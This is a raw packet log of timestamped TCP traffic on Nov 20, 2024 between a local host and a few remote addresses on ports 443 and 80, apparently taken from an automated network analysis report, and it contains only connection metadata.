                                                                                                            Nov 20, 2024 16:57:49.516999960 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.521364927 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.521409988 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.521415949 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.524765968 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.524816036 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.524821997 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.669075966 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.669161081 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.669179916 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672384977 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672393084 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672446012 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.672450066 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672472000 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.672498941 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.675697088 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.675704956 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.675741911 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.675757885 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.675766945 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.675775051 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.680135012 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.680141926 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.680207968 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.680227041 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.683568954 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.683607101 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.683624029 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.683640003 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.683813095 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.686971903 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.686980009 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.687045097 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.687052965 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.691278934 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.691332102 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.691339016 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.694744110 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.694808006 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.694816113 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.698065042 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.698143959 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.698151112 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.702424049 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.702526093 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.702538013 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.706342936 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.706430912 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.706439018 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.709743023 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.709824085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.709832907 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.713180065 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.713246107 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.713253021 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.717472076 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.717525959 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.717533112 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.720936060 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.720997095 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.721004009 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.724256039 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.724327087 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.724334002 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.800909996 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.801001072 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:49.803049088 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:49.803059101 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.807924986 CET49169443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:49.807936907 CET44349169198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.870343924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.870440006 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.870455980 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.874008894 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.874022961 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.874069929 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.874072075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.874109983 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878143072 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878155947 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878180981 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878196955 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.878205061 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.878556967 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.881442070 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.881454945 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.881500959 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.881510019 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.884917974 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.884934902 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.884993076 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.885001898 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.889261007 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.889271021 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.889317989 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.889326096 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.892770052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.892818928 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.892822027 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.892841101 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:49.893595934 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:49.896045923 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.574671984 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.576666117 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.578933954 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.579010963 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.579019070 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.581850052 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.725014925 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.725198984 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.725234985 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.733118057 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.733268023 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.733300924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.735204935 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.735284090 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.735300064 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.778170109 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.809861898 CET4917080192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:50.890685081 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.890702963 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.890785933 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.890841007 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.890861034 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.890873909 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.890882015 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.890913963 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.890919924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.890938997 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.890953064 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.890995979 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891000986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891011000 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891052008 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891057014 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891074896 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891128063 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891139984 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891144991 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891176939 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891190052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891237974 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891242027 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891256094 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891310930 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891324043 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891340017 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891344070 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891375065 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891380072 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891408920 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891458988 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891463995 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891473055 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891515970 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891521931 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891541004 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.891583920 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891602039 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.891606092 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.892067909 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.892375946 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.926472902 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.926613092 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.926624060 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.929410934 CET8049170192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.929977894 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.930111885 CET4917080192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:50.933528900 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.933564901 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.933573008 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.933603048 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.936875105 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:50.936943054 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:50.936949015 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.010536909 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.010711908 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.010724068 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.010757923 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.010782003 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.010917902 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.010979891 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.010987043 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011085033 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011145115 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.011152029 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011229992 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011280060 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.011286020 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011401892 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011460066 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.011466026 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011538029 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011595011 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.011601925 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011706114 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011760950 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.011768103 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011873960 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.011929035 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.011934042 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.012006998 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.012064934 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.012072086 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.012135983 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.012192965 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.012198925 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.012275934 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.012336969 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.012341976 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.077912092 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.127979994 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.128000975 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.128062010 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.128074884 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.131309986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.131386995 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.131395102 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.132545948 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.135674953 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.135735035 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.135746002 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.138848066 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.138917923 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.138928890 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.142117977 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.142180920 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.142189026 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.145895958 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.145972013 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.145978928 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.148973942 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.149048090 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.149055004 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.151920080 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.151978016 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.151984930 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.155885935 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.155957937 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.155965090 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.159356117 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.159406900 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.159416914 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.162436008 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.162491083 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.162498951 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.165551901 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.165606976 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.165613890 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.169392109 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.169456005 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.169462919 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.170145988 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.172393084 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.172458887 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.172466040 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.175431013 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.178721905 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.965436935 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.965477943 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.965487003 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.968446016 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.968513966 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.968523026 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.972531080 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.972608089 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.972620010 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.975358963 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.975435972 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.975445986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.978969097 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.979042053 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.979053020 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.981888056 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.981988907 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.981998920 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.985824108 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.985896111 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.985908031 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.992003918 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.992111921 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.992127895 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.992206097 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.992259979 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.992269993 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.993627071 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.996615887 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:51.996681929 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:51.996691942 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.149010897 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.149102926 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.149122953 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151648998 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151674032 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151730061 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.151740074 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151751041 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.151762009 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.151793957 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.154783964 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.154807091 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.154995918 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.157332897 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.157352924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.157404900 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.157423019 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.163517952 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.163583994 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.163613081 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.163624048 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.163687944 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.164952993 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.164977074 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.165029049 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.165038109 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.167766094 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.167836905 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.167848110 CET44349168142.215.209.78192.168.2.22
